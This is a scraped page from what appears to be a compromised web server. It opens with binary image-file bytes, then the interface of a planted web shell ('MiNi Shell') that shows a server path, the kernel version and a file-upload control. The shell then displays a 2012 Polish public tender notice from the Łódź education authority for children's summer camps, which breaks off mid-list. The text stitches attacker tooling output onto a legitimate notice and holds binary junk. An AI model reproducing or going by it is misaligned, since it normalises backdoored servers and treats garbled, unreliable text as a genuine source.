JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120606/190932-N-2012.html

<p class="kh_header"><b>Łódź: Przedmiotem zamówienia jest zorganizowanie wypoczynku letniego na terenie kraju dla dzieci bez 
    zabezpieczenia socjalnego z województwa łódzkiego.</b><br>
<b>Numer ogłoszenia: 190932 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kuratorium Oświaty w Łodzi , al. Kościuszki 120a, 90-446 Łódź, woj. łódzkie, tel. 042 6371867, faks 042 6360385.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kuratorium.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie wypoczynku letniego na terenie kraju dla dzieci bez 
    zabezpieczenia socjalnego z województwa łódzkiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie wypoczynku letniego na terenie kraju dla dzieci bez 
    zabezpieczenia socjalnego z województwa łódzkiego.


ZADANIE I -  organizacja kolonii letnich wypoczynkowych na terenach leśnych w pobliżu rzeki lub jeziora dla 70 dzieci ze szkół podstawowych 

Termin realizacji zamówienia: 1 lub 2 turnusy w wybranym przez wykonawcę terminie 
od 15.07.2012 r. - do 31.08.2012 r. 

ZADANIE II - organizacja kolonii letnich wypoczynkowych nad morzem dla 70 dzieci ze szkół podstawowych z Łodzi.

Termin realizacji zamówienia: 1 lub 2 turnusy w wybranym przez wykonawcę terminie 
od 15.07.2012 r. - do 31.08.2012 r. 

2. Uszczegółowienie przedmiotu zamówienia dla ZADAŃ od I i II.
2.1. Przez obiekt kolonijny rozumie się budynek, pawilon lub zespół budynków, pawilonów 
     zlokalizowanych w jednym kompleksie i bezpośrednio ze sobą  sąsiadujących, położony z dala (tzn. 
     co najmniej 100 m) od dróg i ulic o dużym natężeniu ruchu samochodowego. Obiekt przeznaczony 
     na placówkę wypoczynku dzieci musi spełniać wymogi dotyczące bezpieczeństwa, ochrony 
     przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych 
     przepisami: o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. 
     Zamawiający nie dopuszcza zakwaterowania w szkołach tj. w izbach lekcyjnych. Zamawiający nie 
     dopuszcza zakwaterowania dzieci na kondygnacjach powyżej II - piętra. 
2.2. Obiekt kolonijny, w którym będzie zorganizowany wypoczynek dzieci winien spełniać co najmniej 
     następujące wymogi:
a/ zakwaterowanie dzieci w pokojach maksymalnie 6 osobowych wyposażonych w łóżka z pościelą 
     (dopuszcza się łóżka piętrowe).
b/ każdy pokój musi być wyposażony w szafę z wieszakami i półkami w ilości zapewniającej  
      rozpakowanie bagażu przez każde zakwaterowane w pokoju dziecko, stół, co najmniej dwa 
      krzesła oraz szafki nocne,
c/  posiadać pełny węzeł sanitarny z ciepłą i zimną wodą przez całą dobę, przy czym może być on 
      zlokalizowany w odrębnym, murowanym budynku,
d/   posiadać jadalnię usytuowaną na terenie obiektu kolonijnego,
e/  posiadać oddzielną świetlicę wyposażoną w: TV, video, sprzęt audio oraz różne gry świetlicowe dla 
      grupy co najmniej 20 dzieci, książki, czasopisma młodzieżowe 
f/    posiadać wydzielone pokoje na izolatki dla chorych dzieci tj. odrębną dla dziewcząt i chłopców,
g/  teren obiektu kolonijnego musi być oświetlony latarniami elektrycznymi i otoczony ogrodzeniem 
       (z wyłączeniem ogrodzenia naturalnego: np. żywopłot, tuja, drzewa i krzewy), które zabezpiecza 
       wejście/wyjście do i z obiektu.
h/  dysponować dostępem do boisk sportowo-rekreacyjnych na terenie obiektu lub w odległości do 
       300 m od niego. Ponadto Wykonawca winien dysponować co najmniej następującym sprzętem 
       sportowo-rekreacyjnym przed rozpoczęciem każdego turnusu: 10 piłek do siatkówki, siatka do
       gry w p. siatkową, 5 piłek do gry w piłkę nożną, stół do ping-ponga (2 komplety rakietek do gry),
       20 skakanek, 10 kompletów (rakietki) do gry w badmintona. 
i/ posiadać dostęp do strzeżonego kąpieliska położonego w odległości do 800 m od obiektu 
     kolonijnego oraz opiekę ratownika podczas kąpieli dzieci,
j/ posiadać wystawioną przez straż pożarną, aktualną na rok 2012 opinie o dopuszczeniu obiektu 
     kolonijnego do zorganizowania w nim wypoczynku dla dzieci 

2.3. Organizacja wypoczynku musi być zgodna z wymogami rozporządzenia MEN z dn. 21.01.1997 r. 
     w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży 
     szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. Nr 12 poz. 67 
     z póź. zm.), a ponadto obejmować:
a/ 14-dniowy pobyt dzieci w ośrodku /w tym 13 noclegów/. Przez 14 dniowy pobyt rozumie się 
     13 noclegów i 14 pełnych dziennych posiłków: śniadanie, obiad, podwieczorek, kolacja;
b/ pełne wyżywienie (4 posiłki dziennie, gorący posiłek po przyjeździe dzieci do ośrodka bez względu
     na godzinę przyjazdu, suchy prowiant na drogę powrotną) przy dziennej stawce tzw. wsadu do 
     kotła w wysokości 18 zł, przy czym wsad do kotła będzie musiał być udokumentowany dziennym 
     raportem żywieniowym. Raport żywieniowy powinien zawierać: dane o ilości żywionych dzieci, 
     jadłospis, zlecenie wydania z magazynu produktów żywnościowych.
     Żywienie uczestników wypoczynku powinno odbywać się zgodnie z zasadami higieny oraz 
     racjonalnego żywienia określonymi w odrębnych przepisach.
c/ realizację oferty programowej zawierającą co najmniej takie jej elementy jak: 5 zabaw quizowych, 
     5 konkursów z nagrodami rzeczowymi i dyplomami, 3 dyskoteki, 2 ogniska, kolonijną olimpiadę 
     sportową. Wykonawca może ofertę programową rozszerzyć o wycieczki autokarowe, rowerowe, 
     piesze.
d/ opiekę pedagogiczną wychowawców w czasie przejazdu na kolonie poprzez opiekę w czasie pobytu 
     dzieci na kolonii aż do wydania dzieci rodzicom lub prawnym opiekunom w miejscu przyjazdu 
     dzieci z kolonii. Zamawiający nie dopuszcza sytuacji, w której w czasie podróży dzieci na i z kolonii 
     opiekę będzie sprawowała inna osoba niż wychowawcy przypisani do każdej grupy kolonijnej. 
e/ pełną opiekę medyczną przez 24 godz/dobę (pielęgniarka na stałe, a lekarz na wezwanie). 
     Wykonawcę obowiązuje zabezpieczenie apteczki w podstawowe leki i materiały opatrunkowe do 
     udzielenia, w razie konieczności pierwszej pomocy przedlekarskiej.
f/  koszty przejazdu dzieci na i z kolonii sprawnym technicznie autokarem, który w dniu wyjazdu 
      (podstawienia autokaru na miejsce zbiórki) posiada wszystkie aktualne przeglądy i dokumenty 
      wymagane do przewozu pasażerów. Nie dopuszcza się przewozu dzieci w godzinach 
      22.00 - 6.00.
      Miejscowością wyjazdu dzieci na kolonie będzie: 
      dla ZADANIA I	 - Łódź
      dla ZADANIA II 	 - Łódź
      
      Zamawiający zastrzega sobie prawo, poddania podstawionego autokaru oraz kierowcy/ów kontroli 
      przez policję.
g/ koszty ubezpieczenia dzieci w czasie podróży i pobytu dzieci na koloniach od następstw 
      nieszczęśliwych wypadków,
h/ doposażenie w podstawowe przedmioty codziennego użytku (np. środki higieny osobistej, 
      niezbędną odzież, obuwie) uczestników tego wymagających. Dokumentację potwierdzającą 
      spełnienie tego warunku Wykonawca będzie zobowiązany okazywać do wglądu podczas kontroli 
      kolonii. 

2.4. Zamawiający dopuszcza zmianę liczby uczestników kolonii w stosunku do tej określonej w SIWZ   
     (odrębnie dla każdej części zadania), o +/- 15 %. Dokładną liczbę dzieci, skierowanych na kolonie, 
     zamawiający określi najpóźniej w dniu podpisania umowy.
     W takim przypadku wartość zamówienia będzie wyliczona według następującej formuły: 
     Ilość dzieci x ofertowa cena (brutto) skierowania 1 dziecka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada zaświadczenie o wpisie do rejestru organizatorów i pośredników turystycznych, wydane przez marszałka województwa właściwego dla siedziby przedsiębiorcy, a jego aktualność potwierdzi wydrukiem z Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że w okresie ostatnich 
    3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
    - w tym okresie wykonał, co najmniej 3 usługi polegające na organizacji 14 - dniowego   
    wypoczynku, dla co najmniej połowy liczby dzieci określonej  dla 
    numeru zadania, na które wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że dysponuje lub będzie 
    dysponował w dacie wykonywania zamówienia w miejscu jego wykonywania:
a/ obiektem kolonijnym spełniającym co najmniej następujące wymogi: Przez obiekt kolonijny rozumie się budynek, pawilon lub zespół budynków, pawilonów 
     zlokalizowanych w jednym kompleksie i bezpośrednio ze sobą  sąsiadujących, położony z dala (tzn. 
     co najmniej 100 m) od dróg i ulic o dużym natężeniu ruchu samochodowego. Obiekt przeznaczony 
     na placówkę wypoczynku dzieci musi spełniać wymogi dotyczące bezpieczeństwa, ochrony 
     przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych 
     przepisami: o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. 
     Zamawiający nie dopuszcza zakwaterowania w szkołach tj. w izbach lekcyjnych. Zamawiający nie 
     dopuszcza zakwaterowania dzieci na kondygnacjach powyżej II - piętra. 
2.2. Ponadto obiekt kolonijny, w którym będzie zorganizowany wypoczynek dzieci winien spełniać co najmniej 
     następujące wymogi:
a/ zakwaterowanie dzieci w pokojach maksymalnie 6 osobowych wyposażonych w łóżka z pościelą 
     (dopuszcza się łóżka piętrowe).
b/ każdy pokój musi być wyposażony w szafę z wieszakami i półkami w ilości zapewniającej  
      rozpakowanie bagażu przez każde zakwaterowane w pokoju dziecko, stół, co najmniej dwa 
      krzesła oraz szafki nocne,
c/  posiadać pełny węzeł sanitarny z ciepłą i zimną wodą przez całą dobę, przy czym może być on 
      zlokalizowany w odrębnym, murowanym budynku,
d/   posiadać jadalnię usytuowaną na terenie obiektu kolonijnego,
e/  posiadać oddzielną świetlicę wyposażoną w: TV, video, sprzęt audio oraz różne gry świetlicowe dla 
      grupy co najmniej 20 dzieci, książki, czasopisma młodzieżowe 
f/    posiadać wydzielone pokoje na izolatki dla chorych dzieci tj. odrębną dla dziewcząt i chłopców,
g/  teren obiektu kolonijnego musi być oświetlony latarniami elektrycznymi i otoczony ogrodzeniem 
       (z wyłączeniem ogrodzenia naturalnego: np. żywopłot, tuja, drzewa i krzewy), które zabezpiecza 
       wejście/wyjście do i z obiektu.
h/  dysponować dostępem do boisk sportowo-rekreacyjnych na terenie obiektu lub w odległości do 
       300 m od niego. Ponadto Wykonawca winien dysponować co najmniej następującym sprzętem 
       sportowo-rekreacyjnym przed rozpoczęciem każdego turnusu: 10 piłek do siatkówki, siatka do
       gry w p. siatkową, 5 piłek do gry w piłkę nożną, stół do ping-ponga (2 komplety rakietek do gry),
       20 skakanek, 10 kompletów (rakietki) do gry w badmintona. 
i/ posiadać dostęp do strzeżonego kąpieliska położonego w odległości do 800 m od obiektu 
     kolonijnego oraz opiekę ratownika podczas kąpieli dzieci,
j/ posiadać wystawioną przez straż pożarną, aktualną na rok 2012 opinie o dopuszczeniu obiektu 
     kolonijnego do zorganizowania w nim wypoczynku dla dzieci</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że dysponuje lub będzie 
    dysponował w dacie wykonywania zamówienia w miejscu jego wykonywania:
a/ kierownikiem kolonii z uprawnieniami MEN z dn. 21.01.1997 r. (Dz. U. z 1997 r Nr 218 12 poz. 67 
    z póź. zm.) i udokumentowanym (poprzez wskazanie dat, miejsca i organizatora wypoczynku), 
    minimum trzyletnim doświadczeniem w pełnieniu funkcji kierownika kolonii, przy czym kierownik 
    kolonii nie może być jednocześnie wychowawcą. 
b/ wychowawcami z uprawnieniami MEN z dn. 21.01.1997 r. (Dz. U. z 1997 r Nr 218 12 poz. 67 z póź. 
    zm.) i udokumentowanym (poprzez wskazanie dat, miejsca i organizatora wypoczynku), 
    doświadczeniem w pracy jako wychowawca kolonijny na co najmniej trzech, 14-dniowych 
    turnusach lub czterech 10-dniowych. Należy uwzględnić zatrudnienie - 1 wychowawca na grupę 
    15 uczestników.
c/ pielęgniarką z prawem wykonywania zawodu, zgodnie z ustawą z dnia 5 lipca 1996 r. o zawodach
    pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 i Nr 219, poz. 1706); obecną w ośrodku  
    przez 24 h,
d/ratownikiem posiadającym kurs pozwalający na pełnienie funkcji ratownika wodnego oraz 
    udokumentowane (poprzez wskazanie dat, miejsca i organizatora wypoczynku), doświadczenie tj. 
    co najmniej dwa sezony letnie w pełnieniu funkcji ratownika,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada:
a)aktualne i opłacone na dzień składania ofert ubezpieczenie OC lub zabezpieczenie finansowe 
    w zakresie prowadzonej działalności gospodarczej, o którym mowa w art. 5 ustawy o usługach 
    turystycznych z 29 sierpnia 1997 r. (tj. Dz. U. z 2004 r Nr 223 poz. 2268 z późn. zm.) oraz
    w rozporządzeniu Ministra Finansów z 16 grudnia 2010 r. (Dz. U. z 2010 r. Nr 238 poz. 1584)
    w sprawie minimalnej wysokości sumy gwarancji bankowej lub ubezpieczeniowej wymaganej 
    w związku z działalnością wykonywaną przez organizatorów turystyki i pośredników turystycznych - 
    na kwotę min. 4 500 euro.

UWAGA:  Jeśli wykonawca składa ofertę na dwa ZADANIA winien jest udokumentować, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
z przedmiotem zamówienia na wartość nie mniejszą niż krotność kwoty min. 4 500 (np. gdy wykonawca składa oferty na dwa zadania to kwota ubezpieczenia OC nie może być mniejsza niż  
9 000 euro). 

W sytuacji gdy zabezpieczenie finansowe nie obejmuje okresu zamówienia, na który wykonawca składa ofertę, wymagane jest złożenie przez wykonawcę oświadczenia o gotowości odnowienia polisy.

b) środki finansowe na rachunku bankowym bądź w spółdzielczej kasie oszczędnościowo-kredytowej
     lub zdolność kredytową w wysokości co najmniej:
     dla ZADANIA I	- 41 000 zł
     dla ZADANIA II	- 46 000 zł
     
UWAGA:  Jeśli wykonawca składa ofertę na dwa ZADANIA winien jest udokumentować, że 
posiada środki finansowe na rachunku bankowym bądź w spółdzielczej kasie oszczędnościowo-
kredytowej lub zdolność kredytową w wysokości równej co najmniej sumie kwot określonych 
przez Zamawiającego, dla poszczególnych ZADAŃ zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

